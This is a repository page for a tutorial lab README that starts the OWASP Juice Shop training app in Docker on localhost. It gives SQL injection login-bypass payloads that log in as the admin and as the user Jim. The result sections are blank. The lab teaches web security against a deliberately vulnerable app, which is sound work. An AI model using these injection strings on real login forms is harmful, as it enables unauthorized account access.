manuth/UKBTutorials
1
0
Fork 0
Code Issues Pull requests Packages Projects Releases Wiki Activity
UKBTutorials/Lab03 - Let's Buy Some Juice
History
Manuel Thalmann c7093cd7a8 Add solutions for SQL Injection
2023-11-10 13:00:16 +01:00
..
README.md Add solutions for SQL Injection 2023-11-10 13:00:16 +01:00

README.md

Let's Buy Some Juice

Booting Up Juice Shop

docker run --pull always -p 127.0.0.1:80:3000 bkimminich/juice-shop

SQL Injection

Login as Admin

  1. Open Account => Login
  2. Type ' OR TRUE; -- into Email and any password in Password

Result:

Login as Jim

  1. Open Account => Login
  2. Type jim@juice-sh.op'; --

Result: